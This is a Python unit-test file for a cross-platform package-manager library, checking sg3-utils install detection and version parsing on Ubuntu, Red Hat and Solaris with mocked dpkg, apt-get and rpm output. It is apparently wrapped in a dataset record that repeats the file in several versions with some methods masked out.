RpmMixin().get_installed_version(self.rpm_v2) self.assertEqual(result, {'version': '18.168.6.1-34.el7'}) class GeneralTest(unittest.TestCase): def _is_solaris(self): from infi.os_info import get_platform_string return get_platform_string().split('-')[0] == 'solaris' def test_get_package_manager(self): package_manager = pkgmgr.get_package_manager() package_to_check = 'python' if self._is_solaris(): package_to_check = 'CSW' + package_to_check self.assertTrue(package_manager.is_package_installed(package_to_check))
normal
{ "blob_id": "b3c1843a742a82bca61650ab89ea8afdf3c9010d", "index": 6667, "step-1": "<mask token>\n\n\nclass TestUbuntuMock(TestOnUbuntu):\n\n def _should_skip(self):\n pass\n\n def _dpkg_query_s(self):\n from textwrap import dedent\n if self._installed:\n return Output(stdout=dedent(\n \"\"\"\n Package: sg3-utils\n Status: installed ok installed\n Priority: optional\n Version: 1.30-1\n Section: admin\n \"\"\"\n ).encode('ascii'))\n else:\n return Output(stdout=dedent(\n \"\"\"\n dpkg-query: package sg3-utils is not installed and no information is available\n Use dpkg --info (= dpkg-deb --info) to examine archive files,\n and dpkg --contents (= dpkg-deb --contents) to list their contents.\n \"\"\"\n ).encode('ascii'), returncode=1)\n\n def _dpkg_query_l(self):\n from textwrap import dedent\n return Output(stdout=dedent(\n \"\"\"\n Desired=Unknown/Install/Remove/Purge/Hold\n | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend\n |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)\n ||/ Name Version Architecture Description\n +++-===========================-==================-==================-===========================================================\n {} sg3-utils 1.30-1 i386 utilities for devices using the SCSI command set\n \"\"\"\n .format('ii' if self._installed else 'un')).encode('ascii'))\n <mask token>\n\n def _apt_get_update(self):\n return Output()\n <mask token>\n <mask token>\n\n def test_check_unknown_package(self):\n with self._apply_patches():\n super(TestUbuntuMock, self).test_check_unknown_package()\n\n def setUp(self):\n self._installed = False\n\n def _is_package_seems_to_be_installed(self, package_name, executable_name):\n return self._installed\n\n\nclass TestRedHatMock(TestOnRedHat):\n\n def _should_skip(self):\n pass\n\n def _rpm_query(self):\n return Output(stdout=b'sg3_utils-1.25-5.el5' if self._installed else\n b'package sg3_utils is not installed', returncode=0 if self.\n _installed else 1)\n\n def _yum_install(self):\n self._installed = True\n return Output()\n\n @contextmanager\n def _apply_patches(self):\n with patch('infi.execute.execute') as execute:\n\n def side_effect(*args, **kwargs):\n command = args[0]\n if '-q' in command:\n return self._rpm_query()\n elif 'install' in command:\n return self._yum_install()\n raise NotImplementedError()\n execute.side_effect = side_effect\n yield\n\n def test_sg3_utils(self):\n with self._apply_patches():\n super(TestRedHatMock, self).test_sg3_utils()\n pass\n\n def setUp(self):\n self._installed = False\n\n def _is_package_seems_to_be_installed(self, package_name, executable_name):\n return self._installed\n\n\nclass test_package_versioning(unittest.TestCase):\n Solaris_v1 = b' VERSION: 6.0.100.000,REV=08.01.2012.09.00'\n Solaris_v2 = b' VERSION: 5.14.2.5'\n Ubuntu_v1 = b'Version: 0.4.9-3ubuntu7.2'\n Ubuntu_v2 = b'Version: 1:1.2.8.dfsg-1ubuntu1'\n rpm_v1 = b'4.8-7.el7'\n rpm_v2 = b'18.168.6.1-34.el7'\n\n def test_solaris_versioning_v1(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Solaris_v1\n patched().get_returncode.return_value = 0\n result = SolarisPackageManager().get_installed_version(self.\n Solaris_v1)\n self.assertEqual(result, {'version': '6.0.100.000', 'revision':\n '08.01.2012.09.00'})\n\n def test_solaris_versioning_v2(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Solaris_v2\n patched().get_returncode.return_value = 0\n result = SolarisPackageManager().get_installed_version(self.\n Solaris_v2)\n self.assertEqual(result, {'version': '5.14.2.5'})\n\n def test_ubuntu_versioning_v1(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Ubuntu_v1\n patched().get_returncode.return_value = 0\n result = UbuntuPackageManager().get_installed_version(self.\n Ubuntu_v1)\n self.assertEqual(result, {'version': '0.4.9-3ubuntu7.2'})\n\n def test_ubuntu_versioning_v2(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Ubuntu_v2\n patched().get_returncode.return_value = 0\n result = UbuntuPackageManager().get_installed_version(self.\n Ubuntu_v2)\n self.assertEqual(result, {'version': '1:1.2.8.dfsg-1ubuntu1'})\n\n def test_rpm_versioning_v1(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.rpm_v1\n patched().get_returncode.return_value = 0\n result = RpmMixin().get_installed_version(self.rpm_v1)\n self.assertEqual(result, {'version': '4.8-7.el7'})\n\n def test_rpm_versioning_v2(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.rpm_v2\n patched().get_returncode.return_value = 0\n result = RpmMixin().get_installed_version(self.rpm_v2)\n self.assertEqual(result, {'version': '18.168.6.1-34.el7'})\n\n\nclass GeneralTest(unittest.TestCase):\n\n def _is_solaris(self):\n from infi.os_info import get_platform_string\n return get_platform_string().split('-')[0] == 'solaris'\n\n def test_get_package_manager(self):\n package_manager = pkgmgr.get_package_manager()\n package_to_check = 'python'\n if self._is_solaris():\n package_to_check = 'CSW' + package_to_check\n self.assertTrue(package_manager.is_package_installed(package_to_check))\n", "step-2": "<mask token>\n\n\nclass Output(object):\n\n def __init__(self, returncode=0, stdout='', stderr=''):\n super(Output, self).__init__()\n self._returncode = returncode\n self._stdout = stdout\n self._stderr = stderr\n\n def get_stdout(self):\n return self._stdout\n <mask token>\n <mask token>\n <mask token>\n\n\nclass TestUbuntuMock(TestOnUbuntu):\n\n def _should_skip(self):\n pass\n\n def _dpkg_query_s(self):\n from textwrap import dedent\n if self._installed:\n return Output(stdout=dedent(\n \"\"\"\n Package: sg3-utils\n Status: installed ok installed\n Priority: optional\n Version: 1.30-1\n Section: admin\n \"\"\"\n ).encode('ascii'))\n else:\n return Output(stdout=dedent(\n \"\"\"\n dpkg-query: package sg3-utils is not installed and no information is available\n Use dpkg --info (= dpkg-deb --info) to examine archive files,\n and dpkg --contents (= dpkg-deb --contents) to list their contents.\n \"\"\"\n ).encode('ascii'), returncode=1)\n\n def _dpkg_query_l(self):\n from textwrap import dedent\n return Output(stdout=dedent(\n \"\"\"\n Desired=Unknown/Install/Remove/Purge/Hold\n | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend\n |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)\n ||/ Name Version Architecture Description\n +++-===========================-==================-==================-===========================================================\n {} sg3-utils 1.30-1 i386 utilities for devices using the SCSI command set\n \"\"\"\n .format('ii' if self._installed else 'un')).encode('ascii'))\n\n def _apt_get_install(self):\n self._installed = True\n return Output()\n\n def _apt_get_update(self):\n return Output()\n\n @contextmanager\n def _apply_patches(self):\n with patch('infi.execute.execute') as execute:\n\n def side_effect(*args, **kwargs):\n command = args[0]\n if 'dpkg-query' in command:\n if '-s' in command:\n return self._dpkg_query_s()\n if '-l' in command:\n return self._dpkg_query_l()\n elif 'apt-get install' in ' '.join(command):\n return self._apt_get_install()\n elif 'apt-get update' in ' '.join(command):\n return self._apt_get_update()\n raise NotImplementedError()\n execute.side_effect = side_effect\n yield\n\n def test_sg3_utils(self):\n with self._apply_patches():\n super(TestUbuntuMock, self).test_sg3_utils()\n\n def test_check_unknown_package(self):\n with self._apply_patches():\n super(TestUbuntuMock, self).test_check_unknown_package()\n\n def setUp(self):\n self._installed = False\n\n def _is_package_seems_to_be_installed(self, package_name, executable_name):\n return self._installed\n\n\nclass TestRedHatMock(TestOnRedHat):\n\n def _should_skip(self):\n pass\n\n def _rpm_query(self):\n return Output(stdout=b'sg3_utils-1.25-5.el5' if self._installed else\n b'package sg3_utils is not installed', returncode=0 if self.\n _installed else 1)\n\n def _yum_install(self):\n self._installed = True\n return Output()\n\n @contextmanager\n def _apply_patches(self):\n with patch('infi.execute.execute') as execute:\n\n def side_effect(*args, **kwargs):\n command = args[0]\n if '-q' in command:\n return self._rpm_query()\n elif 'install' in command:\n return self._yum_install()\n raise NotImplementedError()\n execute.side_effect = side_effect\n yield\n\n def test_sg3_utils(self):\n with self._apply_patches():\n super(TestRedHatMock, self).test_sg3_utils()\n pass\n\n def setUp(self):\n self._installed = False\n\n def _is_package_seems_to_be_installed(self, package_name, executable_name):\n return self._installed\n\n\nclass test_package_versioning(unittest.TestCase):\n Solaris_v1 = b' VERSION: 6.0.100.000,REV=08.01.2012.09.00'\n Solaris_v2 = b' VERSION: 5.14.2.5'\n Ubuntu_v1 = b'Version: 0.4.9-3ubuntu7.2'\n Ubuntu_v2 = b'Version: 1:1.2.8.dfsg-1ubuntu1'\n rpm_v1 = b'4.8-7.el7'\n rpm_v2 = b'18.168.6.1-34.el7'\n\n def test_solaris_versioning_v1(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Solaris_v1\n patched().get_returncode.return_value = 0\n result = SolarisPackageManager().get_installed_version(self.\n Solaris_v1)\n self.assertEqual(result, {'version': '6.0.100.000', 'revision':\n '08.01.2012.09.00'})\n\n def test_solaris_versioning_v2(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Solaris_v2\n patched().get_returncode.return_value = 0\n result = SolarisPackageManager().get_installed_version(self.\n Solaris_v2)\n self.assertEqual(result, {'version': '5.14.2.5'})\n\n def test_ubuntu_versioning_v1(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Ubuntu_v1\n patched().get_returncode.return_value = 0\n result = UbuntuPackageManager().get_installed_version(self.\n Ubuntu_v1)\n self.assertEqual(result, {'version': '0.4.9-3ubuntu7.2'})\n\n def test_ubuntu_versioning_v2(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Ubuntu_v2\n patched().get_returncode.return_value = 0\n result = UbuntuPackageManager().get_installed_version(self.\n Ubuntu_v2)\n self.assertEqual(result, {'version': '1:1.2.8.dfsg-1ubuntu1'})\n\n def test_rpm_versioning_v1(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.rpm_v1\n patched().get_returncode.return_value = 0\n result = RpmMixin().get_installed_version(self.rpm_v1)\n self.assertEqual(result, {'version': '4.8-7.el7'})\n\n def test_rpm_versioning_v2(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.rpm_v2\n patched().get_returncode.return_value = 0\n result = RpmMixin().get_installed_version(self.rpm_v2)\n self.assertEqual(result, {'version': '18.168.6.1-34.el7'})\n\n\nclass GeneralTest(unittest.TestCase):\n\n def _is_solaris(self):\n from infi.os_info import get_platform_string\n return get_platform_string().split('-')[0] == 'solaris'\n\n def test_get_package_manager(self):\n package_manager = pkgmgr.get_package_manager()\n package_to_check = 'python'\n if self._is_solaris():\n package_to_check = 'CSW' + package_to_check\n self.assertTrue(package_manager.is_package_installed(package_to_check))\n", "step-3": "<mask token>\n\n\nclass TestOnRedHat(unittest.TestCase):\n\n def _running_on_redhat(self):\n return distro.id() == 'rhel'\n\n def setUp(self):\n super(TestOnRedHat, self).setUp()\n self._should_skip()\n\n def _should_skip(self):\n if not self._running_on_redhat():\n raise self.skipTest('This test runs only on red hat')\n if not RootPermissions().is_root():\n raise self.skipTest('This test must run with root permissions')\n\n def test_sg3_utils(self):\n self._check_package('sg3_utils', '/usr/bin/sg_inq')\n\n def _check_package(self, package_name, executable_name):\n pkgmgr = RedHatPackageManager()\n is_installed_before = self._is_package_seems_to_be_installed(\n package_name, executable_name)\n self.assertEqual(pkgmgr.is_package_installed(package_name),\n is_installed_before)\n pkgmgr.install_package(package_name\n ) if not is_installed_before else pkgmgr.remove_package(\n package_name)\n self.assertNotEqual(pkgmgr.is_package_installed(package_name),\n is_installed_before)\n\n def _is_package_seems_to_be_installed(self, package_name, executable_name):\n from os.path import exists\n return exists(executable_name)\n\n\nclass Output(object):\n\n def __init__(self, returncode=0, stdout='', stderr=''):\n super(Output, self).__init__()\n self._returncode = returncode\n self._stdout = stdout\n self._stderr = stderr\n\n def get_stdout(self):\n return self._stdout\n\n def get_stderr(self):\n return self._stderr\n\n def get_returncode(self):\n return self._returncode\n\n def wait(self, timeout=None):\n pass\n\n\nclass TestUbuntuMock(TestOnUbuntu):\n\n def _should_skip(self):\n pass\n\n def _dpkg_query_s(self):\n from textwrap import dedent\n if self._installed:\n return Output(stdout=dedent(\n \"\"\"\n Package: sg3-utils\n Status: installed ok installed\n Priority: optional\n Version: 1.30-1\n Section: admin\n \"\"\"\n ).encode('ascii'))\n else:\n return Output(stdout=dedent(\n \"\"\"\n dpkg-query: package sg3-utils is not installed and no information is available\n Use dpkg --info (= dpkg-deb --info) to examine archive files,\n and dpkg --contents (= dpkg-deb --contents) to list their contents.\n \"\"\"\n ).encode('ascii'), returncode=1)\n\n def _dpkg_query_l(self):\n from textwrap import dedent\n return Output(stdout=dedent(\n \"\"\"\n Desired=Unknown/Install/Remove/Purge/Hold\n | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend\n |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)\n ||/ Name Version Architecture Description\n +++-===========================-==================-==================-===========================================================\n {} sg3-utils 1.30-1 i386 utilities for devices using the SCSI command set\n \"\"\"\n .format('ii' if self._installed else 'un')).encode('ascii'))\n\n def _apt_get_install(self):\n self._installed = True\n return Output()\n\n def _apt_get_update(self):\n return Output()\n\n @contextmanager\n def _apply_patches(self):\n with patch('infi.execute.execute') as execute:\n\n def side_effect(*args, **kwargs):\n command = args[0]\n if 'dpkg-query' in command:\n if '-s' in command:\n return self._dpkg_query_s()\n if '-l' in command:\n return self._dpkg_query_l()\n elif 'apt-get install' in ' '.join(command):\n return self._apt_get_install()\n elif 'apt-get update' in ' '.join(command):\n return self._apt_get_update()\n raise NotImplementedError()\n execute.side_effect = side_effect\n yield\n\n def test_sg3_utils(self):\n with self._apply_patches():\n super(TestUbuntuMock, self).test_sg3_utils()\n\n def test_check_unknown_package(self):\n with self._apply_patches():\n super(TestUbuntuMock, self).test_check_unknown_package()\n\n def setUp(self):\n self._installed = False\n\n def _is_package_seems_to_be_installed(self, package_name, executable_name):\n return self._installed\n\n\nclass TestRedHatMock(TestOnRedHat):\n\n def _should_skip(self):\n pass\n\n def _rpm_query(self):\n return Output(stdout=b'sg3_utils-1.25-5.el5' if self._installed else\n b'package sg3_utils is not installed', returncode=0 if self.\n _installed else 1)\n\n def _yum_install(self):\n self._installed = True\n return Output()\n\n @contextmanager\n def _apply_patches(self):\n with patch('infi.execute.execute') as execute:\n\n def side_effect(*args, **kwargs):\n command = args[0]\n if '-q' in command:\n return self._rpm_query()\n elif 'install' in command:\n return self._yum_install()\n raise NotImplementedError()\n execute.side_effect = side_effect\n yield\n\n def test_sg3_utils(self):\n with self._apply_patches():\n super(TestRedHatMock, self).test_sg3_utils()\n pass\n\n def setUp(self):\n self._installed = False\n\n def _is_package_seems_to_be_installed(self, package_name, executable_name):\n return self._installed\n\n\nclass test_package_versioning(unittest.TestCase):\n Solaris_v1 = b' VERSION: 6.0.100.000,REV=08.01.2012.09.00'\n Solaris_v2 = b' VERSION: 5.14.2.5'\n Ubuntu_v1 = b'Version: 0.4.9-3ubuntu7.2'\n Ubuntu_v2 = b'Version: 1:1.2.8.dfsg-1ubuntu1'\n rpm_v1 = b'4.8-7.el7'\n rpm_v2 = b'18.168.6.1-34.el7'\n\n def test_solaris_versioning_v1(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Solaris_v1\n patched().get_returncode.return_value = 0\n result = SolarisPackageManager().get_installed_version(self.\n Solaris_v1)\n self.assertEqual(result, {'version': '6.0.100.000', 'revision':\n '08.01.2012.09.00'})\n\n def test_solaris_versioning_v2(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Solaris_v2\n patched().get_returncode.return_value = 0\n result = SolarisPackageManager().get_installed_version(self.\n Solaris_v2)\n self.assertEqual(result, {'version': '5.14.2.5'})\n\n def test_ubuntu_versioning_v1(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Ubuntu_v1\n patched().get_returncode.return_value = 0\n result = UbuntuPackageManager().get_installed_version(self.\n Ubuntu_v1)\n self.assertEqual(result, {'version': '0.4.9-3ubuntu7.2'})\n\n def test_ubuntu_versioning_v2(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Ubuntu_v2\n patched().get_returncode.return_value = 0\n result = UbuntuPackageManager().get_installed_version(self.\n Ubuntu_v2)\n self.assertEqual(result, {'version': '1:1.2.8.dfsg-1ubuntu1'})\n\n def test_rpm_versioning_v1(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.rpm_v1\n patched().get_returncode.return_value = 0\n result = RpmMixin().get_installed_version(self.rpm_v1)\n self.assertEqual(result, {'version': '4.8-7.el7'})\n\n def test_rpm_versioning_v2(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.rpm_v2\n patched().get_returncode.return_value = 0\n result = RpmMixin().get_installed_version(self.rpm_v2)\n self.assertEqual(result, {'version': '18.168.6.1-34.el7'})\n\n\nclass GeneralTest(unittest.TestCase):\n\n def _is_solaris(self):\n from infi.os_info import get_platform_string\n return get_platform_string().split('-')[0] == 'solaris'\n\n def test_get_package_manager(self):\n package_manager = pkgmgr.get_package_manager()\n package_to_check = 'python'\n if self._is_solaris():\n package_to_check = 'CSW' + package_to_check\n self.assertTrue(package_manager.is_package_installed(package_to_check))\n", "step-4": "<mask token>\n\n\nclass TestOnUbuntu(unittest.TestCase):\n <mask token>\n <mask token>\n\n def _should_skip(self):\n if not self._running_on_ubuntu():\n raise self.skipTest('This test runs only on ubuntu')\n if not RootPermissions().is_root():\n raise self.skipTest('This test must run with root permissions')\n <mask token>\n\n def _check_package(self, package_name, executable_name):\n pkgmgr = UbuntuPackageManager()\n is_installed_before = self._is_package_seems_to_be_installed(\n package_name, executable_name)\n self.assertEqual(pkgmgr.is_package_installed(package_name),\n is_installed_before)\n pkgmgr.install_package(package_name\n ) if not is_installed_before else pkgmgr.remove_package(\n package_name)\n self.assertNotEqual(pkgmgr.is_package_installed(package_name),\n is_installed_before)\n <mask token>\n <mask token>\n\n\nclass TestOnRedHat(unittest.TestCase):\n\n def _running_on_redhat(self):\n return distro.id() == 'rhel'\n\n def setUp(self):\n super(TestOnRedHat, self).setUp()\n self._should_skip()\n\n def _should_skip(self):\n if not self._running_on_redhat():\n raise self.skipTest('This test runs only on red hat')\n if not RootPermissions().is_root():\n raise self.skipTest('This test must run with root permissions')\n\n def test_sg3_utils(self):\n self._check_package('sg3_utils', '/usr/bin/sg_inq')\n\n def _check_package(self, package_name, executable_name):\n pkgmgr = RedHatPackageManager()\n is_installed_before = self._is_package_seems_to_be_installed(\n package_name, executable_name)\n self.assertEqual(pkgmgr.is_package_installed(package_name),\n is_installed_before)\n pkgmgr.install_package(package_name\n ) if not is_installed_before else pkgmgr.remove_package(\n package_name)\n self.assertNotEqual(pkgmgr.is_package_installed(package_name),\n is_installed_before)\n\n def _is_package_seems_to_be_installed(self, package_name, executable_name):\n from os.path import exists\n return exists(executable_name)\n\n\nclass Output(object):\n\n def __init__(self, returncode=0, stdout='', stderr=''):\n super(Output, self).__init__()\n self._returncode = returncode\n self._stdout = stdout\n self._stderr = stderr\n\n def get_stdout(self):\n return self._stdout\n\n def get_stderr(self):\n return self._stderr\n\n def get_returncode(self):\n return self._returncode\n\n def wait(self, timeout=None):\n pass\n\n\nclass TestUbuntuMock(TestOnUbuntu):\n\n def _should_skip(self):\n pass\n\n def _dpkg_query_s(self):\n from textwrap import dedent\n if self._installed:\n return Output(stdout=dedent(\n \"\"\"\n Package: sg3-utils\n Status: installed ok installed\n Priority: optional\n Version: 1.30-1\n Section: admin\n \"\"\"\n ).encode('ascii'))\n else:\n return Output(stdout=dedent(\n \"\"\"\n dpkg-query: package sg3-utils is not installed and no information is available\n Use dpkg --info (= dpkg-deb --info) to examine archive files,\n and dpkg --contents (= dpkg-deb --contents) to list their contents.\n \"\"\"\n ).encode('ascii'), returncode=1)\n\n def _dpkg_query_l(self):\n from textwrap import dedent\n return Output(stdout=dedent(\n \"\"\"\n Desired=Unknown/Install/Remove/Purge/Hold\n | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend\n |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)\n ||/ Name Version Architecture Description\n +++-===========================-==================-==================-===========================================================\n {} sg3-utils 1.30-1 i386 utilities for devices using the SCSI command set\n \"\"\"\n .format('ii' if self._installed else 'un')).encode('ascii'))\n\n def _apt_get_install(self):\n self._installed = True\n return Output()\n\n def _apt_get_update(self):\n return Output()\n\n @contextmanager\n def _apply_patches(self):\n with patch('infi.execute.execute') as execute:\n\n def side_effect(*args, **kwargs):\n command = args[0]\n if 'dpkg-query' in command:\n if '-s' in command:\n return self._dpkg_query_s()\n if '-l' in command:\n return self._dpkg_query_l()\n elif 'apt-get install' in ' '.join(command):\n return self._apt_get_install()\n elif 'apt-get update' in ' '.join(command):\n return self._apt_get_update()\n raise NotImplementedError()\n execute.side_effect = side_effect\n yield\n\n def test_sg3_utils(self):\n with self._apply_patches():\n super(TestUbuntuMock, self).test_sg3_utils()\n\n def test_check_unknown_package(self):\n with self._apply_patches():\n super(TestUbuntuMock, self).test_check_unknown_package()\n\n def setUp(self):\n self._installed = False\n\n def _is_package_seems_to_be_installed(self, package_name, executable_name):\n return self._installed\n\n\nclass TestRedHatMock(TestOnRedHat):\n\n def _should_skip(self):\n pass\n\n def _rpm_query(self):\n return Output(stdout=b'sg3_utils-1.25-5.el5' if self._installed else\n b'package sg3_utils is not installed', returncode=0 if self.\n _installed else 1)\n\n def _yum_install(self):\n self._installed = True\n return Output()\n\n @contextmanager\n def _apply_patches(self):\n with patch('infi.execute.execute') as execute:\n\n def side_effect(*args, **kwargs):\n command = args[0]\n if '-q' in command:\n return self._rpm_query()\n elif 'install' in command:\n return self._yum_install()\n raise NotImplementedError()\n execute.side_effect = side_effect\n yield\n\n def test_sg3_utils(self):\n with self._apply_patches():\n super(TestRedHatMock, self).test_sg3_utils()\n pass\n\n def setUp(self):\n self._installed = False\n\n def _is_package_seems_to_be_installed(self, package_name, executable_name):\n return self._installed\n\n\nclass test_package_versioning(unittest.TestCase):\n Solaris_v1 = b' VERSION: 6.0.100.000,REV=08.01.2012.09.00'\n Solaris_v2 = b' VERSION: 5.14.2.5'\n Ubuntu_v1 = b'Version: 0.4.9-3ubuntu7.2'\n Ubuntu_v2 = b'Version: 1:1.2.8.dfsg-1ubuntu1'\n rpm_v1 = b'4.8-7.el7'\n rpm_v2 = b'18.168.6.1-34.el7'\n\n def test_solaris_versioning_v1(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Solaris_v1\n patched().get_returncode.return_value = 0\n result = SolarisPackageManager().get_installed_version(self.\n Solaris_v1)\n self.assertEqual(result, {'version': '6.0.100.000', 'revision':\n '08.01.2012.09.00'})\n\n def test_solaris_versioning_v2(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Solaris_v2\n patched().get_returncode.return_value = 0\n result = SolarisPackageManager().get_installed_version(self.\n Solaris_v2)\n self.assertEqual(result, {'version': '5.14.2.5'})\n\n def test_ubuntu_versioning_v1(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Ubuntu_v1\n patched().get_returncode.return_value = 0\n result = UbuntuPackageManager().get_installed_version(self.\n Ubuntu_v1)\n self.assertEqual(result, {'version': '0.4.9-3ubuntu7.2'})\n\n def test_ubuntu_versioning_v2(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.Ubuntu_v2\n patched().get_returncode.return_value = 0\n result = UbuntuPackageManager().get_installed_version(self.\n Ubuntu_v2)\n self.assertEqual(result, {'version': '1:1.2.8.dfsg-1ubuntu1'})\n\n def test_rpm_versioning_v1(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.rpm_v1\n patched().get_returncode.return_value = 0\n result = RpmMixin().get_installed_version(self.rpm_v1)\n self.assertEqual(result, {'version': '4.8-7.el7'})\n\n def test_rpm_versioning_v2(self):\n with patch.object(pkgmgr, 'execute_command') as patched:\n patched().get_stdout.return_value = self.rpm_v2\n patched().get_returncode.return_value = 0\n result = RpmMixin().get_installed_version(self.rpm_v2)\n self.assertEqual(result, {'version': '18.168.6.1-34.el7'})\n\n\nclass GeneralTest(unittest.TestCase):\n\n def _is_solaris(self):\n from infi.os_info import get_platform_string\n return get_platform_string().split('-')[0] == 'solaris'\n\n def test_get_package_manager(self):\n package_manager = pkgmgr.get_package_manager()\n package_to_check = 'python'\n if self._is_solaris():\n package_to_check = 'CSW' + package_to_check\n self.assertTrue(package_manager.is_package_installed(package_to_check))\n", "step-5": "from . import UbuntuPackageManager, RedHatPackageManager, SolarisPackageManager, RpmMixin\nfrom infi import unittest\n\nfrom infi.run_as_root import RootPermissions\nfrom contextlib import contextmanager\n\nfrom infi import pkgmgr\nfrom mock import patch\nimport distro\n# pylint: disable-all\n\n\nclass TestOnUbuntu(unittest.TestCase):\n def _running_on_ubuntu(self):\n return distro.id() == \"ubuntu\"\n\n def setUp(self):\n super(TestOnUbuntu, self).setUp()\n self._should_skip()\n\n def _should_skip(self):\n if not self._running_on_ubuntu():\n raise self.skipTest(\"This test runs only on ubuntu\")\n if not RootPermissions().is_root():\n raise self.skipTest(\"This test must run with root permissions\")\n\n def test_sg3_utils(self):\n from infi.execute import execute\n execute('apt-get update'.split())\n self._check_package(\"sg3-utils\", \"/usr/bin/sg_inq\")\n\n def _check_package(self, package_name, executable_name):\n pkgmgr = UbuntuPackageManager()\n is_installed_before = self._is_package_seems_to_be_installed(package_name, executable_name)\n self.assertEqual(pkgmgr.is_package_installed(package_name), is_installed_before)\n # Do the opposite\n pkgmgr.install_package(package_name) if not is_installed_before else pkgmgr.remove_package(package_name)\n self.assertNotEqual(pkgmgr.is_package_installed(package_name), is_installed_before)\n\n def _is_package_seems_to_be_installed(self, package_name, executable_name):\n from os.path import exists\n return exists(executable_name)\n\n def test_check_unknown_package(self):\n pkgmgr = UbuntuPackageManager()\n self.assertFalse(pkgmgr.is_package_installed('blablabla9988ok'))\n\n\nclass TestOnRedHat(unittest.TestCase):\n def _running_on_redhat(self):\n return distro.id() == \"rhel\"\n\n def setUp(self):\n super(TestOnRedHat, self).setUp()\n self._should_skip()\n\n def _should_skip(self):\n if not self._running_on_redhat():\n raise self.skipTest(\"This test runs only on red hat\")\n if not RootPermissions().is_root():\n raise self.skipTest(\"This test must run with root permissions\")\n\n def test_sg3_utils(self):\n self._check_package(\"sg3_utils\", \"/usr/bin/sg_inq\")\n\n def _check_package(self, package_name, executable_name):\n pkgmgr = RedHatPackageManager()\n is_installed_before = self._is_package_seems_to_be_installed(package_name, executable_name)\n self.assertEqual(pkgmgr.is_package_installed(package_name), is_installed_before)\n # Do the opposite\n pkgmgr.install_package(package_name) if not is_installed_before else pkgmgr.remove_package(package_name)\n self.assertNotEqual(pkgmgr.is_package_installed(package_name), is_installed_before)\n\n def _is_package_seems_to_be_installed(self, package_name, executable_name):\n from os.path import exists\n return exists(executable_name)\n\nclass Output(object):\n def __init__(self, returncode=0, stdout='', stderr=''):\n super(Output, self).__init__()\n self._returncode = returncode\n self._stdout = stdout\n self._stderr = stderr\n\n def get_stdout(self):\n return self._stdout\n\n def get_stderr(self):\n return self._stderr\n\n def get_returncode(self):\n return self._returncode\n\n def wait(self, timeout=None):\n pass\n\nclass TestUbuntuMock(TestOnUbuntu):\n def _should_skip(self):\n pass\n\n def _dpkg_query_s(self):\n from textwrap import dedent\n if self._installed:\n return Output(stdout=dedent(\"\"\"\n Package: sg3-utils\n Status: installed ok installed\n Priority: optional\n Version: 1.30-1\n Section: admin\n \"\"\").encode(\"ascii\"))\n else:\n return Output(stdout=dedent(\"\"\"\n dpkg-query: package sg3-utils is not installed and no information is available\n Use dpkg --info (= dpkg-deb --info) to examine archive files,\n and dpkg --contents (= dpkg-deb --contents) to list their contents.\n \"\"\").encode(\"ascii\"), returncode=1)\n\n def _dpkg_query_l(self):\n from textwrap import dedent\n return Output(stdout=dedent(\"\"\"\n Desired=Unknown/Install/Remove/Purge/Hold\n | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend\n |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)\n ||/ Name Version Architecture Description\n +++-===========================-==================-==================-===========================================================\n {} sg3-utils 1.30-1 i386 utilities for devices using the SCSI command set\n \"\"\".format(\"ii\" if self._installed else \"un\")).encode(\"ascii\"))\n\n def _apt_get_install(self):\n self._installed = True\n return Output()\n\n def _apt_get_update(self):\n return Output()\n\n @contextmanager\n def _apply_patches(self):\n with patch(\"infi.execute.execute\") as execute:\n def side_effect(*args, **kwargs):\n command = args[0]\n if \"dpkg-query\" in command:\n if \"-s\" in command:\n return self._dpkg_query_s()\n if \"-l\" in command:\n return self._dpkg_query_l()\n elif \"apt-get install\" in ' '.join(command):\n return self._apt_get_install()\n elif \"apt-get update\" in ' '.join(command):\n return self._apt_get_update()\n raise NotImplementedError()\n execute.side_effect = side_effect\n yield\n\n def test_sg3_utils(self):\n with self._apply_patches():\n 